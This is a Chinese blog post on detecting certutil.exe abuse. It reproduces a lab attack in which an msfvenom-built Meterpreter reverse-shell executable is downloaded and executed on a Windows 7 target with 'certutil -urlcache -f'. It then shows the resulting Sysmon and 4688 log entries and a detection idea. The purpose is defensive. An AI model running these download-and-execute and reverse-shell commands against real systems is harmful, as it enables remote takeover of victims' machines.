监控渗透测试中Certutil利用行为
简介
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件,并获取meterpreter会话。
补充说明:在高版本操作系统中,可以通过配置策略,对进程命令行参数进行记录。日志策略开启方法:本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用,同样也可以在低版本操作系统中部署sysmon,通过sysmon日志进行监控。
基础日志
windows 安全日志/SYSMON日志(需要自行安装)
测试复现
环境准备
攻击机:Kali2019
靶机:win7(sysmon)
攻击分析
生成payload.exe
通过msfvenom 生成恶意可执行文件,并使用start multi/handler获取目标计算机反向shell会话。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.146 lport=1234 -f exe > shell.exe
执行监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.126.146
lhost => 192.168.126.146
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.126.146:1234开启小型http服务
root@12306Br0:~# python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
靶机执行payload
certutil.exe -urlcache -split -f http://192.168.126.146:1234/shell.exe shell.exe & shell.exe
反弹shell
[*] Started reverse TCP handler on 192.168.126.146:1234
[*] Sending stage (180291 bytes) to 192.168.126.149
[*] Sending stage (180291 bytes) to 192.168.126.149
[*] Meterpreter session 1 opened (192.168.126.146:1234 -> 192.168.126.149:49172) at 2020-04-17 15:59:50 +0800
测试留痕
#sysmon日志
EventID: 1
Image: C:\Windows\System32\certutil.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: CertUtil.exe
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CertUtil.exe
CommandLine: certutil.exe -urlcache -split -f http://192.168.126.146:1234/shell.exe shell.exe#win7安全日志
EventID:4688
进程信息:
新进程 ID:0xbcc
新进程名: C:\Windows\System32\certutil.exe#windows server 2008(不含2008)以上系统可以配置审核进程创建策略,达到记录命令行参数的效果。通过命令行参数进行监控分析。
检测规则/思路
无具体检测规则,可根据进程创建事件4688/1(进程名称、命令行)进行监控。本监控方法需要自行安装配置审核策略/sysmon。
参考推荐
渗透测试中的certutil
监控渗透测试中Certutil利用行为相关推荐
- 【python渗透测试】python在渗透测试中的利用(完全版,持续中出)
跟着gpt学习python在渗透测试中的利用
- 详述MySQL服务在渗透测试中的利用
本文作者:i春秋签约作家--Binghe 致力于书写ichunqiu社区历史上最长篇最细致最真实的技术复现文章. 文章目录: MySQL之UDF提权 MySQL之MOF提权 MySQL之常规写启动项提 ...
- 渗透测试中的msiexec
本文讲的是渗透测试中的msiexec, 0x00 前言 在上篇研究了ClickOnce的渗透技巧,接触到了安装包的概念.关于安装包还有一个常见的是msi文件,可在命令行下通过msiexec安装,所以这 ...
- 渗透测试中的端口利用
渗透测试中的端口利用 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可 ...
- 渗透测试中常用端口及利用
渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...
- 渗透测试中的certutil
certutil简介 用于证书管理 支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).as ...
- 渗透测试中信息收集的那些事
渗透测试中信息收集的那些事 转载自:TideSec(知名安全团队)--VllTomFord(大佬)------https://www.cnblogs.com/OpenCyberSec/p/107941 ...
- 【3】web安全入门篇-渗透测试中常用的命令
1.linux命令 渗透测试中常用的linux命令 上面博客提到的基本都能满足需求 2.cmd命令 常用的cmd命令 cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客,多敲一敲用的 ...
- 浅析DNSlog在渗透测试中的实战技巧
文章目录 前言 SSRF 盲打 XSS的盲打 XXE的盲打 SQL的盲注 RCE的盲打 总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把 ...
最新文章
- TinyMCE的使用-安装
- Virtual Machine Remote Control Client Plus
- learning rate四种改变方式
- Consumer搭建
- 后台启动_Windows10中如何阻止程序在后台运行
- 3d打印 路径规划_“光博会+工博会”双展来袭!这个9月,知象光电3D视觉工业应用方案,重磅亮相!...
- 罗技 连点 脚本_罗技推出多款《英雄联盟》联名外设 看了就忍不住想要
- dfs序 + RMQ = LCA
- 洛谷P1031 均分纸牌(贪心)
- 格林时间转yyyy-MM-dd hh:mm:ss
- Springboot vue.js html 跨域 前后分离 Activiti6 shiro 权限
- Atitit java 原生 客户端 native desktop桌面 javafx 浏览器环境 导入jar jfxrt.jar 17M package com.attilax.ui;
- 学习总结——Postman做http接口功能测试
- 数据挖掘概念与技术复习
- u-boot-2012-07 for tiny210, 支持USB DNW, 支持YAFFS2烧写, 彻底抛弃superboot
- 余世雄 - 与上司沟通的7个技巧
- 破解word只读文档 word文档保护后的破解办法
- 【韧性设计】韧性设计模式:重试、回退、超时、断路器
- c语言校友通讯录毕业论文,校友录毕业论文(C_+sql2005).doc
- EverBox开发笔记-1